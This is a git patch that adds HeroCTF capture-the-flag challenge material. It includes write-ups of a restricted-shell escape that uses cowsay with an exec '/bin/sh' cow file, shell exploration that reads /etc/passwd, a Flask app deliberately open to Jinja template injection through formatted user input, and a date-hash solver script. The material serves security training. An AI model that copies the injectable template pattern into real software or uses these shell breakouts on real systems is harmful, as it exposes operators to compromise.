From 031517a34dd0c01d26f9bf2f5098163a59bd2b56 Mon Sep 17 00:00:00 2001 From: agatha Date: Fri, 25 Oct 2024 17:23:01 -0400 Subject: [PATCH] add web/jinjatic --- misc/cloud_shell/README.md | 75 ++++++++++++++++ misc/{ => free_shell}/free_shell.py | 0 misc/moo/README.md | 80 ++++++++++++++++++ web/jinjatic/jinjatic.tar.xz | Bin 0 -> 2196 bytes web/jinjatic/jinjatic/docker-compose.yml | 14 +++ web/jinjatic/jinjatic/src/Dockerfile | 26 ++++++ web/jinjatic/jinjatic/src/challenge/app.py | 53 ++++++++++++ .../jinjatic/src/challenge/requirements.txt | 4 + .../src/challenge/templates/home.html | 21 +++++ .../src/challenge/templates/mail.html | 35 ++++++++ .../src/challenge/templates/result.html | 21 +++++ web/jinjatic/jinjatic/src/flag.txt | 1 + web/jinjatic/jinjatic/src/getflag.c | 21 +++++ web/pryzes/PrYzes/solver.py | 22 +++++ 14 files changed, 373 insertions(+) create mode 100644 misc/cloud_shell/README.md rename misc/{ => free_shell}/free_shell.py (100%) create mode 100644 misc/moo/README.md create mode 100644 web/jinjatic/jinjatic.tar.xz create mode 100644 web/jinjatic/jinjatic/docker-compose.yml create mode 100644 web/jinjatic/jinjatic/src/Dockerfile create mode 100644 web/jinjatic/jinjatic/src/challenge/app.py create mode 100644 web/jinjatic/jinjatic/src/challenge/requirements.txt create mode 100644 web/jinjatic/jinjatic/src/challenge/templates/home.html create mode 100644 web/jinjatic/jinjatic/src/challenge/templates/mail.html create mode 100644 web/jinjatic/jinjatic/src/challenge/templates/result.html create mode 100644 web/jinjatic/jinjatic/src/flag.txt create mode 100644 web/jinjatic/jinjatic/src/getflag.c create mode 100644 web/pryzes/PrYzes/solver.py diff --git a/misc/cloud_shell/README.md b/misc/cloud_shell/README.md new file mode 100644 index 0000000..0b2a16c --- /dev/null +++ b/misc/cloud_shell/README.md @@ -0,0 +1,75 @@ +``` +/ $ echo $PATH +/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin +/ $ ls -l /usr/local/sbin +ls: /usr/local/sbin: No such file or directory +/ $ ls -l /usr/local/bin +ls: /usr/local/bin: No such file or directory +/ $ ls -l /usr/sbin +ls: /usr/sbin: No such file or directory +/ $ ls -l /usr/bin +ls: /usr/bin: No such file or directory +/ $ ls -l /sbin +ls: /sbin: No such file or directory +/ $ ls -l /bin +total 4120 +-rwxr-xr-x 1 root 0 808712 Oct 24 17:14 cat +-rwxr-xr-x 2 root 0 443480 Oct 24 17:14 cloud_cat +-rwxr-xr-x 1 root 0 443480 Oct 24 17:14 cloud_create +-rwxr-xr-x 1 root 0 443480 Oct 24 17:14 cloud_list +-rwxr-xr-x 1 root 0 443480 Oct 24 17:14 cloud_mv +-rwxr-xr-x 1 root 0 808712 Oct 24 17:14 ls +-rwxr-xr-x 1 root 0 808712 Oct 24 17:14 sh +``` + +``` +/ $ cat /etc/passwd +root:x:0:0:root:/root:/bin/sh +bin:x:1:1:bin:/bin:/sbin/nologin +daemon:x:2:2:daemon:/sbin:/sbin/nologin +lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin +sync:x:5:0:sync:/sbin:/bin/sync +shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown +halt:x:7:0:halt:/sbin:/sbin/halt +mail:x:8:12:mail:/var/mail:/sbin/nologin +news:x:9:13:news:/usr/lib/news:/sbin/nologin +uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin +cron:x:16:16:cron:/var/spool/cron:/sbin/nologin +ftp:x:21:21::/var/lib/ftp:/sbin/nologin +sshd:x:22:22:sshd:/dev/null:/sbin/nologin +games:x:35:35:games:/usr/games:/sbin/nologin +ntp:x:123:123:NTP:/var/empty:/sbin/nologin +guest:x:405:100:guest:/dev/null:/sbin/nologin +nobody:x:65534:65534:nobody:/:/sbin/nologin +gaoler:x:1000:1000:Linux User,,,:/home/gaoler:/bin/sh +restricted:x:1001:1001:Linux User,,,:/home/restricted:/bin/jail +``` + +``` + ____ _ _ ____ _ _ _ + / ___| | ___ _ _ __| | / ___|| |__ ___| | | +| | | |/ _ \| | | |/ _` | \___ \| '_ \ / _ \ | | +| |___| | (_) | |_| | (_| | ___) | | | | __/ | | + \____|_|\___/ \__,_|\__,_| |____/|_| |_|\___|_|_| + + +Welcome to Cloud Shell ! + +Here you can interact with your personal vault using our custom binaries : +- cloud_cat : Get the content of the specified file +- cloud_list : List your current file(s) +- cloud_mv : Rename a file +- cloud_create : Create a file with his content + +If you don't know how to use a binary, just execute it without arguments, help will be provided ! + +/ $ cloud_cat +Usage: cloud_cat +/ $ cloud_list +cloud_socket +/ $ cloud_mv +Usage: cloud_mv +/ $ cloud_create +Usage: cloud_create +/ $ +``` diff --git a/misc/free_shell.py b/misc/free_shell/free_shell.py similarity index 100% rename from misc/free_shell.py rename to misc/free_shell/free_shell.py diff --git a/misc/moo/README.md b/misc/moo/README.md new file mode 100644 index 0000000..49d1717 --- /dev/null +++ b/misc/moo/README.md @@ -0,0 +1,80 @@ +# misc/Moo +We are given SSH access to a machine. We drop into a restricted shell and must break out of it to read the flag. + +``` +ssh -p 11380 dyn05.heroctf.fr +user@dyn05.heroctf.fr's password: +Linux moo 6.1.0-25-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.106-3 (2024-08-26) x86_64 + +The programs included with the Debian GNU/Linux system are free software; +the exact distribution terms for each program are described in the +individual files in /usr/share/doc/*/copyright. + +Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent +permitted by applicable law. +Last login: Fri Oct 25 20:27:41 2024 from 149.102.226.202 + ______________________________________________________ +/ Welcome dear CTF player! You can read the flag with: \ +\ /bin/sudo /bin/cat /flag.txt. Or can you?... / + ------------------------------------------------------ + \ ^__^ + \ (oo)\_______ + (__)\ )\/\ + ||----w | + || || +``` + +When we try to run the commands, we see we're in a restricted shell: +``` +user@moo:~$ /bin/sudo /bin/cat /flag.txt +bash: /bin/sudo: restricted: cannot specify `/' in command names +``` + +Let's take a look at our environment a bit with `env`: +``` +bash: env: command not found +``` + +Next thing to do would be look at what our `PATH` is set to: +``` +user@moo:~$ echo $PATH +/usr/local/rbin +``` + +Attempting to update our `PATH` with `export` fails as well: +``` +user@moo:~$ PATH=/bin sudo id +bash: PATH: readonly variable +bash: sudo: command not found +``` + +Well, let's see what is actually available to us in the only `PATH` we have available: +``` +user@moo:~$ ls -la $PATH +total 24 +drwxr-xr-x 1 root root 4096 Oct 25 18:18 . +drwxr-xr-x 1 root root 4096 Oct 25 18:18 .. +lrwxrwxrwx 1 root root 17 Oct 25 18:18 cowsay -> /usr/games/cowsay +lrwxrwxrwx 1 root root 18 Oct 25 18:18 dircolors -> /usr/bin/dircolors +lrwxrwxrwx 1 root root 7 Oct 25 18:18 ls -> /bin/ls +-rwxr-xr-x 1 root root 206 Oct 25 17:35 rbash +-rwxr-xr-x 1 root root 54 Oct 25 17:35 vim +``` + +This reveals a few things: +- We are in a restricted bashshell +- We have `cowsay` + +So we use `cowsay` as a the GTFObin that it is, however we cannot redirect output. Luckily we have +`vim`. + +After putting our breakout (`exec "/bin/sh";`) into a file, we can then run it with `cowsay`: +``` +cowsay -f tmp x +``` + +This gives us a full unrestricted shell, and we can now `cat` the flag: +``` +PATH=/bin +Hero{s0m3_s4cr3d_c0w} +``` diff --git a/web/jinjatic/jinjatic.tar.xz b/web/jinjatic/jinjatic.tar.xz new file mode 100644 index 0000000000000000000000000000000000000000..087be447460c88f027fc44c5d69de9d3d476f6b6 GIT binary patch literal 2196 zcmV;F2y6HKH+ooF000E$*0e?hz|s(apaCHP8~^|S0000^6v4{iPyYx?T>v#2N*{jF zw-SR>c>Ba*bDrQ4FKCux%G1;6D^XG2L%o_o5-(^@Mf9g5g_3x&Ap+QsjO>*&46m7I z0g}W-1#N&Rp{KIhlNaDucCI{NOd7$WlzSr*bbEE$q7}7Ks6Qbi@VdJ1Vyns?3-Dt@ z?>}8Q|1fbl?}sEZzjaFdhpJnqJOs`Mahl9^n_7y9g5}1|7nFM<(tL8N)-v{u+gIQ!V@&ONAwKt=DzBv#WYl@?NRR$+dHNN}m@93-9A4Bv1->;FU&c z!g@n&Vv3A5``$1~%50Izc%K|~3AW%uDqu10SNrZ8W>L*X&OI=YM6q9uauKdU5|BwW zc6%+SO*J}Htc$Cym@gP(hLmrv!~rud2BU|Z*Wa?(daSNu+@H|X+nmq1l{s(@QgBl*G>HooC zM;W5~9scT;%t18IWNIISjonMEaa3!yrfkcw506Jvq_{nBuSZI$Q>$a-8bN$D@(|j!WDkoS%JD%UYE|;88W& zw0Fp7wNXWf+W>`dLHhA!2P6N}hXScd>Y?-KejL<(vRhjCiy9OMf7 zYZEF=8BKuQD0Dh44PpT2yf`+91gf`*WqoZ5r`ql$)9bjiI|>%)$}zbr3}N);ig*!c z+Cph*c=&W+=2oTRM>JB5xRY5L15{osyYP{hfcykp{#iPeHi=6+L zMCU$tDAoHF(OXxg44k+I*8hNjbAf7Q{nf8ddNzK)u<(`Wx(L=`&`P^=Sm ztFaN}>OETMd+p8tcVccmL$gEhBVQ&tJNVrX6NdbW1F)?fB^WZ z@|SXH87M38&>Jl-LQo3{X^h@Ram+c|+CuYv3t`4}+Tn5zNRGxV>y`r_S-`Nizq!cv zVq0SZ7iTK(&Px9|5^R{PglToe?i6kU+;viy$bc$s$vYj8(VVvpMY0bW$7axTRNbIY z(D=k2txm@KKTF)B>u~fqE{wPT%UupkCI~uSxpf20J)n`4ONsVDV16{l7d=qFOJv?#8p|wT-d`W-~S=FqN(FpzeH z-oBr`wx)VilH}Cqdr6wuelmc@R{%GG`0iXGOOiLFd&udeVFS zu=xsn9&@sRh1q2E{v?Nb&C#<3tU`_pbQ{LO0cRxL2Z1Yz+ z(S8)i$1z#eizfLURTWPXF}b4?ag00l!Z`81yrkmf2A{QBR2)Yq?1tT&6GFCLm#zL0 z->M|@>v$=)?y`xFb`{9TO%Erf_I-d4;d3Kmh@_9==fSU)CoUPhyKO1*0ZcqgT{>_7{M{WR@!@=vAzO^U6QetS#q*E + + + + + Email Result + + + +
+
+

Welcome on the platform !

+

Your email to connect is: %s

+
+ Generate another welcome email +
+ + + + + +''' + +class EmailModel(BaseModel): + email: EmailStr + +@app.route('/') +def home(): + return render_template('home.html') + +@app.route('/mail') +def mail(): + return render_template('mail.html') + +@app.route('/render', methods=['POST']) +def render_email(): + email = request.form.get('email') + + try: + email_obj = EmailModel(email=email) + return Template(email_template%(email)).render() + except ValidationError as e: + return render_template('mail.html', error="Invalid email format.") + +if __name__ == '__main__': + app.run(host="0.0.0.0", port=80) diff --git a/web/jinjatic/jinjatic/src/challenge/requirements.txt b/web/jinjatic/jinjatic/src/challenge/requirements.txt new file mode 100644 index 0000000..4346070 --- /dev/null +++ b/web/jinjatic/jinjatic/src/challenge/requirements.txt @@ -0,0 +1,4 @@ +flask +pydantic +pydantic[email] +jinja2 diff --git a/web/jinjatic/jinjatic/src/challenge/templates/home.html b/web/jinjatic/jinjatic/src/challenge/templates/home.html new file mode 100644 index 0000000..279ffff --- /dev/null +++ b/web/jinjatic/jinjatic/src/challenge/templates/home.html @@ -0,0 +1,21 @@ + + + + + + Home + + + +
+
+

We render, you use it

+

Give us emails of your customers to send them a welcome email.

+ Go to Email Page +
+
+ + + + + diff --git a/web/jinjatic/jinjatic/src/challenge/templates/mail.html b/web/jinjatic/jinjatic/src/challenge/templates/mail.html new file mode 100644 index 0000000..693237a --- /dev/null +++ b/web/jinjatic/jinjatic/src/challenge/templates/mail.html @@ -0,0 +1,35 @@ + + + + + + Mail + + + +
+
+
+

Enter email of your client

+ + {% if error %} + + {% endif %} + +
+
+ + +
+ +
+
+
+
+ + + + + diff --git a/web/jinjatic/jinjatic/src/challenge/templates/result.html b/web/jinjatic/jinjatic/src/challenge/templates/result.html new file mode 100644 index 0000000..0f20315 --- /dev/null +++ b/web/jinjatic/jinjatic/src/challenge/templates/result.html @@ -0,0 +1,21 @@ + + + + + + Email Result + + + +
+
+

Welcome on the platform !

+

Your email to connect is: {{ email }}

+
+ Generate another welcome email +
+ + + + + diff --git a/web/jinjatic/jinjatic/src/flag.txt b/web/jinjatic/jinjatic/src/flag.txt new file mode 100644 index 0000000..508ddf5 --- /dev/null +++ b/web/jinjatic/jinjatic/src/flag.txt @@ -0,0 +1 @@ +HERO{FAKE_FLAG} \ No newline at end of file diff --git a/web/jinjatic/jinjatic/src/getflag.c b/web/jinjatic/jinjatic/src/getflag.c new file mode 100644 index 0000000..c96c7eb --- /dev/null +++ b/web/jinjatic/jinjatic/src/getflag.c @@ -0,0 +1,21 @@ +#include +#include + +int main() { + const char *file_path = "/root/flag.txt"; + + FILE *file = fopen(file_path, "r"); + if (file == NULL) { + perror("Erreur lors de l'ouverture du fichier"); + return EXIT_FAILURE; + } + + char ch; + while ((ch = fgetc(file)) != EOF) { + putchar(ch); + } + + fclose(file); + + return EXIT_SUCCESS; +} \ No newline at end of file diff --git a/web/pryzes/PrYzes/solver.py b/web/pryzes/PrYzes/solver.py new file mode 100644 index 0000000..4da6a21 --- /dev/null +++ b/web/pryzes/PrYzes/solver.py @@ -0,0 +1,22 @@ +import hashlib +import json +from datetime import datetime + + +def compute_sha256(data): + sha256_hash = hashlib.sha256() + sha256_hash.update(data.encode("utf-8")) + return sha256_hash.hexdigest() + + +def main(): + # create datetime object with date 25/10/2121 + date_obj = datetime.strptime("25/10/2121", "%d/%m/%Y") + + json_data = json.dumps({"date": date_obj.strftime("%d/%m/%Y")}) + print(compute_sha256(json_data)) + print(json_data) + + +if __name__ == '__main__': + main()